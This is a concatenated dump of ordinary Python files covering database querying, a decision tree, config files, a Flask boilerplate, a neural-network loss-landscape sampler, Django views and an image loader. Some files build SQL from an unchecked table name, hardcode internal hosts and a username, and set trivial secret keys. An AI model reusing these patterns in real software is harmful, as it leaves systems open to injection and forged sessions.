decision_tree","sub_path":"classicML/backend/python/tree/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158547500","text":"import pyodbc \nimport pandas as pd\n\ndef query_wa(pwd, table,\n\tserver = 'BHICALWA02,50900', database = 'WA_CAL_CALGARY_Defn',\n\tuid = 'jordwil',\n\t\t\t):\n\t'''\n\tQueries WellArchitect database:\n\tReturns pandas datarame of the supplied table\n\n\tserver: default = BHICALWA02,50900\n\t\n\tdatabase: default = WA_CAL_CALGARY_Defn\n\n\tuid: default = jordwil \n\trequires user 4-3-1\n\t\n\tRequired\n\tpwd: default = None\n\ttable: default = None\n\t'''\n\tcnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n\t\t\t\t\t\t\t\"Server=\"+str(server)+\";\"\n\t\t\t\t\t\t\t\"Database=\"+str(database)+\";\"\n\t\t\t\t\t\t\t\"trusted_connection=yes;\"\n\t\t\t\t\t\t\t\"uid=\"+str(uid)+\";pwd=\"+str(pwd)+\";\"\n\t\t\t\t\t\t)\n\t#df = pd.read_sql_query('select * from table', cnxn)\n\tcrsr = cnxn.cursor()\n\tfor table_info in crsr.tables(tableType='TABLE'):\n\t\tprint(table_info.table_name)\n\t\t\n\tquery = \"SELECT * FROM [\"+str(table)+\"]\"\n\tdf = pd.read_sql(query, cnxn)\n\tcnxn.close()\n\n\treturn df\n\n### ### ### ###\ndef main():\n\treturn ''\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"wellarchitect/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517021949","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\n\r\nsaving = []\r\n\r\n\r\ndef Ent(data_set):\r\n \"\"\"\r\n 计算交叉熵\r\n :param data_set: 输入一组样本数据n*(features; labels) list\r\n :return: 本组数据的交叉熵 float\r\n \"\"\"\r\n classify = [] # labels\r\n number = [] # label对应数量\r\n length = 0\r\n for i in range(len(data_set)):\r\n if data_set[i][-1] in classify:\r\n idx = classify.index(data_set[i][-1])\r\n number[idx] = number[idx] + 1\r\n else:\r\n classify.append(data_set[i][-1])\r\n number.append(1)\r\n length = length + 1\r\n\r\n entropy = 0\r\n for i in range(length):\r\n pro = number[i] / len(data_set)\r\n if pro is not 0:\r\n entropy = entropy + (-pro) * np.log2(pro)\r\n\r\n return entropy\r\n\r\n\r\ndef info_gain(data_origin, data_list):\r\n \"\"\"\r\n 计算信息增益\r\n :param data_origin: 原始的数据组 array\r\n :param data_list: 划分后的n组数据 n*(features; labels)*n1 list 元素为array\r\n :return: 划分前后的信息增益 float\r\n \"\"\"\r\n after_entropy = 0\r\n for item in iter(data_list):\r\n after_entropy = after_entropy + Ent(item)\r\n\r\n return Ent(data_origin) - after_entropy\r\n\r\n\r\ndef data_load(filename='iris.csv'):\r\n \"\"\"\r\n 将数据读入并进行处理\r\n :param filename:\r\n :return:\r\n \"\"\"\r\n csv_er = pd.read_csv(filename)\r\n val = csv_er.values\r\n DataList = []\r\n for i in range(val.shape[0]):\r\n DataList.append(val[i])\r\n return DataList\r\n\r\n\r\ndef select_boundary(iris, num_features):\r\n \"\"\"\r\n\r\n :param num_features:\r\n :param iris: 等待划分的连续数据变量 list\r\n :return:\r\n \"\"\"\r\n boundary = []\r\n for i in num_features:\r\n # 对iris[i]进行排序并求中位点\r\n iris.sort(key=lambda d: d[i])\r\n gain = 0\r\n bound = -1\r\n for j in range(len(iris) - 1):\r\n middle = (iris[j][i] + iris[j + 1][i]) / 2\r\n list1 = []\r\n list2 = []\r\n for item in iris:\r\n if item[i] >= middle:\r\n list1.append(item)\r\n else:\r\n list2.append(item)\r\n gain = max(info_gain(iris, [list1, list2]), gain)\r\n if info_gain(iris, [list1, list2]) >= gain:\r\n bound = middle\r\n boundary.append([gain, bound])\r\n return boundary\r\n\r\n\r\ndef is_same_cat(processed_data):\r\n \"\"\"\r\n\r\n :param processed_data: 处理后的数据 list\r\n :return: True or False\r\n \"\"\"\r\n if bool(processed_data) is False:\r\n return False\r\n else:\r\n compare = processed_data[0][-1]\r\n for item in processed_data:\r\n if item[-1] is not compare:\r\n return False\r\n return True\r\n\r\n\r\ndef get_decision_tree(loaded_data, layer, parent=None, to_be_split=None):\r\n if to_be_split is None:\r\n to_be_split = [0, 1, 2, 3]\r\n if is_same_cat(loaded_data) is False and layer < 4:\r\n criterion = select_boundary(loaded_data, to_be_split)\r\n # pick the max criterion as the bound\r\n # delete the index of this criterion in [0 1 2 3]\r\n idx = criterion.index(max(criterion))\r\n list1 = []\r\n list2 = []\r\n for item in loaded_data:\r\n if item[to_be_split[idx]] >= criterion[idx][1]:\r\n list1.append(item)\r\n else:\r\n list2.append(item)\r\n if bool(list1) and bool(list2) is True:\r\n print(\r\n \"Decision layer:{} from:{} class1:{} class2:{} criterion:{} threshold:{}\".format(layer, parent,\r\n len(list1),\r\n len(list2),\r\n to_be_split[idx],\r\n criterion[idx][1]))\r\n saving.append([layer, parent, to_be_split[idx], criterion[idx][1], None, None])\r\n to_be_split.pop(idx)\r\n temp1 = []\r\n temp2 = []\r\n for item in to_be_split:\r\n temp1.append(item)\r\n temp2.append(item)\r\n get_decision_tree(list1, layer + 1, parent='class1', to_be_split=temp1)\r\n get_decision_tree(list2, layer + 1, parent='class2', to_be_split=temp2)\r\n return\r\n else:\r\n \"\"\"\r\n select the most label as the category\r\n \"\"\"\r\n cat = []\r\n times = []\r\n for item in loaded_data:\r\n if item[-1] in cat:\r\n times[cat.index(item[-1])] = times[cat.index(item[-1])] + 1\r\n else:\r\n cat.append(item[-1])\r\n times.append(1)\r\n position = times.index(max(times))\r\n print(\"In Decision layer:{} class:{} category:{}\".format(layer - 1, parent, cat[position]))\r\n for item in saving:\r\n if item[0] == layer - 1:\r\n if parent is 'class1':\r\n item[4] = cat[position]\r\n elif parent is 'class2':\r\n item[5] = cat[position]\r\n return\r\n\r\n else:\r\n if layer >= 4:\r\n pass\r\n else:\r\n print(\"In Decision layer:{} class:{} category:{}\".format(layer - 1, parent, loaded_data[0][-1]))\r\n for item in saving:\r\n if item[0] == layer - 1:\r\n if parent is 'class1':\r\n item[4] = loaded_data[0][-1]\r\n elif parent is 'class2':\r\n item[5] = loaded_data[0][-1]\r\n return\r\n\r\n\r\ndef model(one_data, critic):\r\n i = 0\r\n path = [None]\r\n label = None\r\n for item in critic:\r\n if item[0] == i and path[i] == item[1]:\r\n if one_data[item[2]] >= item[3]:\r\n path.append('class1')\r\n if item[4] is not None:\r\n label = item[4]\r\n else:\r\n path.append('class2')\r\n if item[5] is not None:\r\n label = item[5]\r\n i = i + 1\r\n if label is one_data[-1]:\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\ndef validation(test_data, critic):\r\n acc = 0\r\n for item in test_data:\r\n acc = acc + model(item, critic)\r\n return acc/len(test_data) * 100\r\n\r\n\r\nif __name__ == '__main__':\r\n data = data_load(filename='iris.csv')\r\n train = []\r\n for i in range(100):\r\n x = random.randint(0, len(data)-1)\r\n train.append(data[x])\r\n data.pop(x)\r\n get_decision_tree(train, layer=0)\r\n print(saving)\r\n print('Test accuracy is {}%'.format(validation(data, critic=saving)))\r\n","sub_path":"decision tree.py","file_name":"decision tree.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430603271","text":"\n\n#calss header\nclass _MAGIC():\n\tdef __init__(self,): \n\t\tself.name = \"MAGIC\"\n\t\tself.definitions = [u'with special powers: ', u'happening in an unusual or unexpected way, or easily or quickly: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_magic.py","file_name":"_magic.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60249765","text":"import os\n\nHOST = os.getenv('HOST', '192.168.71.149')\nPORT = os.getenv('PORT', 19530)\nDIMENSION = os.getenv('DIMENSION', 512)\nDEFAULT_TABLE = os.getenv(\"DEFAULT_TABLE\", \"milvus\")\nUPLOAD_PATH = \"/data/pic-server/search_for_pictures/tmp\"\nREDIS_NAME = \"HCLC_IMG_COLLECTION\"\nREDIS_URI = os.getenv('REDIS_URI', '127.0.0.1')\nREDIS_PORT = os.getenv(\"REDIS_PORT\", 6379)\nIMG_TYPE = [\"jpg\", \"png\", \"jpeg\"]\nTHREAD_NUM = os.getenv(\"THREAD_NUM\", 20)\nMONGODB_COLLECTION_NAME = 'HCLC'\nMONGODB_URI = os.getenv('MONGODB_URI', '192.168.70.198')\nMONGODB_PORT = os.getenv('MONGODB_PORT', 27017)\n\n","sub_path":"common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64715161","text":"from HelperFunctions import*\nfrom triangle import*\n \t\t\nclass Bullet(object):\n\tdef __init__(self, trimodel, color, pos, dir):\n\t\tself.tri = trimodel\n\t\tself.color = color\n\t\tself.pos = pos\n\t\tself.dir = dir\n\n\tdef draw_bullet(self):\n\t\tself.tri.set_cell(self.pos, wheel(self.color))\n\t\n\tdef move_bullet(self):\t\t\t\n\t\tnewspot = tri_in_direction(self.pos, self.dir, 1)\t# Where is the bullet going?\n\t\tif self.tri.cell_exists(newspot):\t# Is new spot off the board?\n\t\t\tself.pos = newspot\t# On board. Update spot\n\t\t\tself.draw_bullet()\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\t# Off board. Kill.\n\t\t\t\nclass Spinner(object):\n\tdef __init__(self, trimodel, pos):\n\t\tself.tri = trimodel\n\t\tself.pos = pos\n\t\tself.start = pos\n\t\tself.time = 0\n\n\tdef move_spinner(self):\n\t\tnewspot = tri_in_direction(self.pos, randDir(), 2)\n\t\tif self.tri.cell_exists(newspot):\n\t\t\tself.pos = newspot\n\t\tif self.time > 100:\n\t\t\tself.time = 0\n\t\t\tself.pos = self.start\n\n\tdef draw_spinner(self, color):\n\t\tself.time += 1\n\t\tfor size in range(4):\n\t\t\tring_cells = get_ring(self.pos, size)\n\t\t\tnum_cells = len(ring_cells)\n\t\t\tfor c in range(num_cells):\n\t\t\t\tif self.tri.cell_exists(ring_cells[c]):\n\t\t\t\t\tgradient = 1 - (abs(c - (self.time % num_cells))/(float)(num_cells-1))\n\t\t\t\t\t#self.tri.set_cell(ring_cells[c],gradient_wheel(color, gradient))\n\t\t\t\t\tself.tri.set_cells(self.tri.mirror_coords(ring_cells[c]),\n\t\t\t\t\t\tgradient_wheel(color, gradient))\n\t\t\t\t\nclass Spinners(object):\n\tdef __init__(self, trimodel):\n\t\tself.name = \"Spinners\" \n\t\tself.tri = trimodel\n\t\tself.spinners = []\t# List that holds Spinner objects\n\t\tself.bullets = []\t# List that holds Bullets objects\n\t\tself.speed = 0.05\n\t\tself.background = randColor()\n\t\tself.spincolor = randColor()\n\t\t \n\tdef next_frame(self):\n\n\t\tfor center in all_centers():\n\t\t\tnewspinner = Spinner(self.tri, center)\n\t\t\tself.spinners.append(newspinner)\n\n\t\twhile (True):\n\t\t\t\n\t\t\t# Randomly fire a bullet\n\t\t\t\n\t\t\tself.draw_background()\n\t\t\t\n\t\t\t# Draw the bullets\n\t\t\t\t\n\t\t\tfor b in self.bullets:\n\t\t\t\tif b.move_bullet() == False:\t# bullet has moved off the board\n\t\t\t\t\tself.bullets.remove(b)\t# kill the bullet\n\t\t\t\n\t\t\t# Random move the spin centers\n\t\t\t\n\t\t\tfor s in self.spinners:\n\t\t\t\ts.draw_spinner(self.spincolor)\n\t\t\t\tif oneIn(5):\n\t\t\t\t\ts.move_spinner()\n\t\t\t\tif oneIn(5):\n\t\t\t\t\tnewbullet = Bullet(self.tri, self.spincolor, s.pos, randDir())\n\t\t\t\t\tself.bullets.append(newbullet)\n\t\t\t\n\t\t\t# Change the colors\n\t\t\t\n\t\t\tself.background = (self.background + 5) % maxColor\t\t\t\t\t\n\t\t\t\n\t\t\tself.spincolor = (maxColor + self.spincolor - 10) % maxColor\n\t\t\t\n\t\t\tyield self.speed\n\t\n\t# Draw the background - concentric triangles of decreasing intensities\n\t\n\tdef draw_background(self):\n\t\tfor i in range (12,0,-1): # total number of triangles\n\t\t\tfor corner in all_left_corners():\n\t\t\t\tself.tri.set_cells(tri_shape(corner, i),\n\t\t\t\t\t\t\tgradient_wheel(self.background, 1-(i/12.0)))\n","sub_path":"shows/Spinners.py","file_name":"Spinners.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"564278819","text":"import os\n\n# set debug to true for development\nDEBUG = True\n\n# App directory\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# App name\nAPP_NAME = \"Python Flask Boilerplate\"\n\n# Threads per core\nTHREADS_PER_PAGE = 2\n\n# Enable protection agains *Cross-site Request Forgery (CSRF)*\nCSRF_ENABLED = True\n\n# Use a secure, unique and absolutely secret key for\n# signing the data.\nCSRF_SESSION_KEY = \"code\"\n\n# Secret key for signing cookies\nSECRET_KEY = \"code\"\n\nALLOWED_HEADERS = ['Access-Token, X-Requested-With, Content-Type, Accept']\nALLOWED_ORIGINS = '*'\nALLOWED_METHODS = ['GET', 'HEAD', 'POST', 'OPTIONS', 'PUT', 'PATCH', 'DELETE']\n\n# Environment - dev, stage, prod\nAPP_ENV = 'dev'\n\n# Default values\nPAGE_LIMIT = 20\n\n# Error messages\nERROR = {\n 'no_results': 'No results found',\n 'permission': 'You do not have permission to do this action'\n}\n\nprint(\" * Loading config for \" + APP_NAME)\n","sub_path":"instance/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440301958","text":"import torch\nfrom torch import Tensor\n\nfrom logging import debug\nimport os\nimport sys\nfrom warnings import resetwarnings\nfrom torch._C import device\n\nfrom torch.functional import Tensor\nfrom .utils import read_list, write_list\nimport h5py\n\n# import torch.distributed as dist\n\nimport numpy as np\nfrom . import projection as proj, scheduler\nimport torch.multiprocessing as mp\nimport time\nfrom functools import partial\nfrom utils import mpi4pytorch as mpi\n\ndef get_weights_as_list(net):\n \"\"\" Extract parameters from net, and return a list of tensors\"\"\"\n return [p.data for p in net.parameters()]\n\ndef get_random_weights(weights):\n \"\"\"\n Produce a random direction that is a list of random Gaussian tensors\n with the same shape as the network's weights, so one direction entry per weight.\n \"\"\"\n return [torch.randn(w.size()) for w in weights]\n\nclass Direction:\n ################################################################################\n # Normalization Functions\n ################################################################################\n @staticmethod\n def _normalize(direction: Tensor, weights: Tensor, norm='filter'):\n \"\"\"\n Rescale the direction so that it has similar norm as their corresponding\n model in different levels.\n\n Args:\n direction (tensor): a variables of the random direction for one layer\n weights (tensor): a variable of the original model for one layer\n norm: normalization method, 'filter' | 'layer' | 'weight'\n \"\"\"\n if norm == 'filter':\n # Rescale the filters (weights in group) in 'direction' so that each\n # filter has the same norm as its corresponding filter in 'weights'.\n assert direction.dim() == 3 and weights.dim() == 3\n sc = weights.norm(dim=(-1, -2), keepdim=True)/(direction.norm(dim=(-1, -2), keepdim=True) + 1e-10)\n direction.mul_(sc)\n elif norm == 'layer':\n # Rescale the layer variables in the direction so that each layer has\n # the same norm as the layer variables in weights.\n direction.mul_(weights.norm()/direction.norm())\n elif norm == 'weight':\n # Rescale the entries in the direction so that each entry has the same\n # scale as the corresponding weight.\n direction.mul_(weights)\n elif norm == 'dfilter':\n # Rescale the entries in the direction so that each filter direction\n # has the unit norm.\n dnorm = direction.view(direction.size(0), -1).norm(dim=-1).view(direction.size())\n direction.div_(dnorm + 1e-10)\n elif norm == 'dlayer':\n # Rescale the entries in the direction so that each layer direction has\n # the unit norm.\n direction.div_(direction.norm())\n\n @staticmethod\n def normalize_for_weights(direction, weights, norm='filter', ignore='biasbn'):\n \"\"\"\n The normalization scales the direction entries according to the entries of weights.\n \"\"\"\n assert(len(direction) == len(weights))\n for d, w in zip(direction, weights):\n if d.dim() <= 1:\n if ignore == 'biasbn': d.fill_(0) # ignore directions for weights with 1 dimension\n else: d.copy_(w) # keep directions for weights/bias that are only 1 per node\n else:\n Direction._normalize(d, w, norm)\n \n @staticmethod\n def create_random_direction(params, ignore='biasbn', norm=True, norm_type='filter'):\n \"\"\"\n Setup a random (normalized) direction with the same dimension as\n the weights or states.\n\n Args:\n net: the given trained model\n dir_type: 'weights' or 'states', type of directions.\n ignore: 'biasbn', ignore biases and BN parameters.\n norm: direction normalization method, including\n 'filter\" | 'layer' | 'weight' | 'dlayer' | 'dfilter'\n\n Returns:\n direction: a random direction with the same dimension as weights or states.\n \"\"\"\n\n # random direction\n weights_data = [p.data for p in params] # a list of parameters.\n direction = [torch.randn(w.size()) for w in params]\n if norm:\n Direction.normalize_for_weights(direction, weights_data, norm_type, ignore)\n return direction\n \n @staticmethod\n def set_weights(net, weights, directions=None, step=None):\n \"\"\"\n Overwrite the network's weights with a specified list of tensors\n or change weights along directions with a step size.\n \"\"\"\n if directions is None:\n # You cannot specify a step length without a direction.\n for (p, w) in zip(net.parameters(), weights):\n p.data.copy_(w.type(type(p.data)))\n else:\n assert step is not None, 'If a direction is specified then step must be specified as well'\n if len(directions) == 2:\n dx = directions[0]\n dy = directions[1]\n # self.logger.info(dx)\n # self.logger.info(len(dx), len(dy))\n changes = [d0*step[0] + d1*step[1] for (d0, d1) in zip(dx, dy)]\n else:\n changes = [d*step for d in directions[0]]\n # self.logger.info('change norm', torch.norm(proj.tensorlist_to_tensor(changes)))\n # self.logger.info(torch.norm(proj.tensorlist_to_tensor(changes)))\n\n for (p, w, d) in zip(net.parameters(), weights, changes):\n s = w + d.to(w.device)\n p.data = s\n \n @staticmethod\n def save(direction, h5_file, name):\n # Create the plotting directions\n write_list(h5_file, name, direction)\n\n def load(h5_file, name):\n # Create the plotting directions\n return read_list(h5_file, name)\n \n @staticmethod\n def to_tensor(dir, **kwargs):\n return [torch.tensor(arr, **kwargs) for arr in dir]\n\nclass Dir2D(object):\n def __init__(self, model=None, dirs = None, mode='random') -> None:\n super().__init__()\n if model is not None:\n weights = get_weights_as_list(model) # List representation\n dir0 = Direction.create_random_direction(weights, norm_type='layer')\n dir1 = Direction.create_random_direction(weights, norm_type='layer')\n self._dir = (dir0, dir1)\n # Todo: Assert these dir are othorgonal\n elif dirs is not None and len(dirs) == 2:\n self._dir = dirs\n \n\n def save(self, h5file):\n Direction.save(self[0], h5file, 'xdir')\n Direction.save(self[1], h5file, 'ydir')\n\n\n @classmethod\n def load(cls, h5file):\n dir0 = Direction.load(h5file, 'xdir')\n dir1 = Direction.load(h5file, 'ydir')\n return cls(dirs=(dir0, dir1))\n\n def __getitem__(self, dir_index):\n return self._dir[dir_index]\n \n def __len__(self):\n return len(self._dir)\n \n def to_tensor(self, **kwargs):\n self.tensors = (Direction.to_tensor(self._dir[0], **kwargs), \n Direction.to_tensor(self._dir[1], **kwargs))\n \n def tensor(self, dir_index):\n return self.tensors[dir_index]\n \n\nclass Surface:\n def __init__(self, path_dir2d, rect, resolution, path, layers) -> None:\n with h5py.File(path_dir2d) as f:\n self.dirs = Dir2D.load(f)\n self.dir_path = path_dir2d\n xmin, ymin, xmax, ymax = rect\n xnum, ynum = int(resolution[0]), int(resolution[1])\n self.xcoord = np.linspace(xmin, xmax, num=xnum)\n self.ycoord = np.linspace(ymin, ymax, num=ynum)\n self.shape = (xnum, ynum)\n self.path = path\n self.h5_file = None\n self.layers = layers\n\n def add_layer(self, *names, value=-1):\n for name in names:\n self.layers[name] = np.ones(self.shape)*value\n\n def mesh(self):\n return np.meshgrid(self.xcoord, self.ycoord)\n\n def save(self, mode='w-'):\n f = h5py.File(self.path, mode) # Create file, fail if exists\n f.attrs['dir_path'] = self.dir_path\n f['xcoord'] = self.xcoord \n f['ycoord'] = self.xcoord\n layer_grp = f.create_group('layers')\n for name, values in self.layers.items():\n layer_grp.create_dataset(name, data=values)\n f.close()\n \n @classmethod\n def load(cls, path):\n f = h5py.File(path, 'r')\n direction_path = f.attrs['dir_path']\n xcoord = f['xcoord'][:]\n ycoord = f['ycoord'][:]\n layer_grp = f['layers']\n layers = {}\n for name, values in layer_grp.items():\n layers[name] = values[:]\n obj = cls(direction_path, (0, 0, 0, 0), (0, 0), path, layers)\n obj.xcoord = xcoord\n obj.ycoord = ycoord\n f.close()\n return obj\n \n def get_unplotted_indices(self, layer):\n \"\"\"\n Args:\n layer: layer name, with value -1 when the value is not yet calculated.\n\n Returns:\n - a list of indices into vals for points that have not yet been calculated.\n - a list of corresponding coordinates, with one x/y coordinate per row.\n \"\"\"\n\n # Create a list of indices into the vectorizes vals\n vals = self.layers[layer]\n inds = np.array(range(vals.size))\n\n # Select the indices of the un-recorded entries, assuming un-recorded entries\n # will be smaller than zero. In case some vals (other than loss values) are\n # negative and those indexces will be selected again and calcualted over and over.\n inds = inds[vals.ravel() <= 0]\n\n # Make lists containing the x- and y-coodinates of the points to be plotted\n # If the plot is 2D, then use meshgrid to enumerate all coordinates in the 2D mesh\n xcoord_mesh, ycoord_mesh = self.mesh()\n s1 = xcoord_mesh.ravel()[inds]\n s2 = ycoord_mesh.ravel()[inds]\n return inds, np.c_[s1,s2]\n\n def open(self, mode):\n self.h5_file = h5py.File(self.path, mode)\n \n def flush(self):\n assert self.h5_file, 'Have yet open'\n self.h5_file.flush()\n\n def close(self):\n assert self.h5_file, 'Have yet open'\n self.h5_file.close()\n\nclass Sampler:\n def __init__(self, model, surface, layer_names, device, comm=None, rank=-1, logger=None) -> None:\n self.model = model\n self.surface = surface\n self.rank = rank\n self.device = device\n self.layer_names = layer_names\n self.comm = comm\n self.logger = logger\n\n def prepair(self):\n # if rank == 0: self.surface.open('r+')\n self.surface.dirs.to_tensor()\n # Generate a list of indices of 'losses' that need to be filled in.\n # The coordinates of each unfilled index (with respect to the direction vectors\n # stored in 'd') are stored in 'coords'.\n # inds, coords, inds_nums = scheduler.get_job_indices(*surface.get_unplotted_indices(loss_key), rank, size)\n self.layers = [self.surface.layers[name] for name in self.layer_names]\n self.layers_fl = [layer.ravel() for layer in self.layers]\n model = self.model\n model.eval()\n # model.to(self.device)\n \n def reduce(self):\n # Send updated plot data to the master node\n if self.rank < 0: return 0\n syc_start = time.time()\n for layer in self.layers_fl:\n # dist.reduce(layer, 0, op=dist.ReduceOp.MAX)\n mpi.reduce_max(self.comm, layer)\n syc_time = time.time() - syc_start\n return syc_time\n \n \n def write(self):\n # Only the master node writes to the file - this avoids write conflicts\n if self.rank <= 0:\n for name, layer in zip(self.layer_names, self.layers):\n self.surface.h5_file['layers'][name][:] = layer\n self.surface.flush()\n\n def run(self, evaluation, inds, coords, inds_nums):\n \"\"\"\n Calculate the loss values and accuracies of modified models in parallel\n using MPI reduce.\n \"\"\"\n # dirs_tensor = (proj.tensorlist_to_tensor(directions[0]), proj.tensorlist_to_tensor(directions[1]))\n self.logger.info('Computing %d values for rank %d'% (len(inds), self.rank))\n start_time = time.time()\n total_sync = 0.0\n with torch.no_grad():\n model = self.model\n weights = [torch.clone(p) for p in model.parameters()]\n # Loop over all uncalculated loss values\n for count, ind in enumerate(inds):\n # Get the coordinates of the loss value being calculated\n coord = coords[count]\n Direction.set_weights(model, weights, self.surface.dirs.tensors, coord)\n # Record the time to compute the loss value\n loss_start = time.time()\n values = evaluation(model)\n loss_compute_time = time.time() - loss_start\n # Record the result in the local array\n for i, val in enumerate(values):\n self.layers_fl[i][ind] = val\n\n syc_time = self.reduce()\n total_sync += syc_time\n self.write()\n\n log_values = '\\t'.join(['{}={:.3f}'.format(name, val) for name, val in zip(self.layer_names, values)])\n self.logger.info('Evaluating rank %d %d/%d (%.1f%%) coord=%s \\t%s \\ttime=%.2f \\tsync=%.2f' % (\n self.rank, count, len(inds), 100.0 * count/len(inds), str(coord), log_values, loss_compute_time, syc_time))\n\n # This is only needed to make MPI run smoothly. If this process has less work than\n # the rank0 process, then we need to keep calling reduce so the rank0 process doesn't block\n for i in range(max(inds_nums) - len(inds)):\n self.reduce()\n\n total_time = time.time() - start_time\n self.logger.info('Rank %d done! Total time: %.2f Sync: %.2f' % (self.rank, total_time, total_sync))\n \n# def main():\n# model = None\n# surface = Surface.load(path)\n# loss_key = ('loss', 'acc')\n# inds, coords, inds_nums = scheduler.get_job_indices(*surface.get_unplotted_indices('loss'), 0, 1)\n# surface.open('r+')\n# sampler = Sampler(model, surface, loss_key,'gpu:0', 0)\n# sampler.prepair()\n# sampler.run(evaluation, inds, coords, inds_nums)\n# surface.close()\n","sub_path":"lib/viztool/landscape.py","file_name":"landscape.py","file_ext":"py","file_size_in_byte":14568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197736064","text":"from django.urls import path\n\nfrom . import views\napp_name = 'todo_demo'\nurlpatterns = [\n path('',views.index, name = 'index'),\n path('todoitem/',views.TodoItemFunc, name = 'TodoItem'),\n path('add/',views.add,name = 'add'),\n path('/edit/',views.edit,name = 'edit'),\n path('save/',views.save,name = 'save'),\n path('/delete/',views.delete,name = 'delete'),\n\n]\n","sub_path":"contactandtodo/todo_demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285564346","text":"import os\nimport re\nimport glob\nimport base64\nfrom django.shortcuts import render\n\nglobalIncrement = -1\nglobalFileNameIncrement = 1;\nimages = ('80001-English-13.png','80001-English-14.png','80001-English-15.png')\n\n# Create your views here.\ndef Index(request):\n\n global globalIncrement\n global globalFileNameIncrement\n image_data = request.POST.get('image_data')\n\n imagesxList = [os.path.basename(x) for x in glob.glob(\"Evaluation/static/imagesx/*\")]\n image_name = images[globalIncrement]\n\n if(image_data != 'Empty' and image_data != None):\n image_data = re.sub(\"^data:image/png;base64,\",\"\",image_data)\n image_data = base64.b64decode(image_data)\n\n for imagesxName in imagesxList:\n if (image_name == imagesxName):\n image_name = image_name.split('.')\n image_name = image_name[0] + '_' + str(globalFileNameIncrement) + '.' + image_name[1]\n globalFileNameIncrement = globalFileNameIncrement + 1\n\n with open(\"Evaluation/static/imagesx/\"+image_name,'wb') as f:\n f.write(image_data)\n\n if (request.POST.get('next')):\n globalIncrement = globalIncrement + 1\n\n if (request.POST.get('previous')):\n globalIncrement = globalIncrement - 1\n\n if (globalIncrement >= len(images)):\n globalIncrement = 0;\n\n if (globalIncrement < 0):\n globalIncrement = 0;\n\n return render(request, '../templates/QuestionEvaluation.html', {'image': images[globalIncrement]})\n","sub_path":"Evaluation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211928873","text":"#!/usr/bin/env python\n\ncnt = int(open('options').read().split('\\n')[2].split()[1])\n\nout_file = open('result', 'w')\nfor i in range(cnt,-1,-1):\n\tfor line in open(str(i)):\n\t\tif 'GC calls:' in line:\n\t\t\tout_file.write('%d\\t' % (cnt-i) + line.split()[2] + '\\n')\n\t\t\tbreak\nout_file.close()\n","sub_path":"data/test/old_parser.py","file_name":"old_parser.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255997989","text":"import keras\r\nfrom keras.preprocessing import image\r\nfrom glob import glob\r\nimport cv2, os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\npath = r'C:\\Users\\Abhijeet\\Desktop\\Skin dataset\\data\\train\\benign'\r\npath1 = r'C:\\Users\\Abhijeet\\Desktop\\Skin dataset\\data\\train\\malignant'\r\nROW, COL = 96, 96\r\nbenigns, malignants = [], []\r\ny_benigns, y_malignants = [], []\r\n\r\ndef load_benigns():\r\n print('Loading all benign images\\n')\r\n benign_path = os.path.join(path, '*g')\r\n for benign_img in glob(benign_path):\r\n benign = cv2.imread(benign_img)\r\n benign = cv2.cvtColor(benign, cv2.COLOR_BGR2GRAY)\r\n benign = cv2.resize(benign, (ROW, COL))\r\n benign = image.img_to_array(benign)\r\n benigns.append(benign)\r\n print('All benign images loaded')\r\n \r\n\r\nload_benigns()\r\ndef load_malignants():\r\n print('Loading all malignant images\\n')\r\n malignant_path = os.path.join(path1, '*g')\r\n for malignant_img in glob(malignant_path):\r\n malignant = cv2.imread(malignant_img)\r\n malignant = cv2.cvtColor(malignant, cv2.COLOR_BGR2GRAY)\r\n malignant = cv2.resize(malignant, (ROW, COL))\r\n malignant = image.img_to_array(malignant)\r\n malignants.append(malignant)\r\n print('All malignant images loaded')\r\nload_malignants()\r\n\r\ny_benigns = [1 for item in enumerate(benigns)]\r\ny_malignants = [0 for item in enumerate(malignants)]\r\n\r\n\r\nbenigns = np.asarray(benigns).astype('float32')\r\nmalignants = np.asarray(malignants).astype('float32')\r\ny_benigns = np.asarray(y_benigns).astype('int32')\r\ny_malignants = np.asarray(y_malignants).astype('int32')\r\nbenigns /= 255\r\nmalignants /= 255\r\n\r\nX = np.concatenate((benigns,malignants), axis=0)\r\ny = np.concatenate((y_benigns, y_malignants), axis=0)\r\n\r\nX = 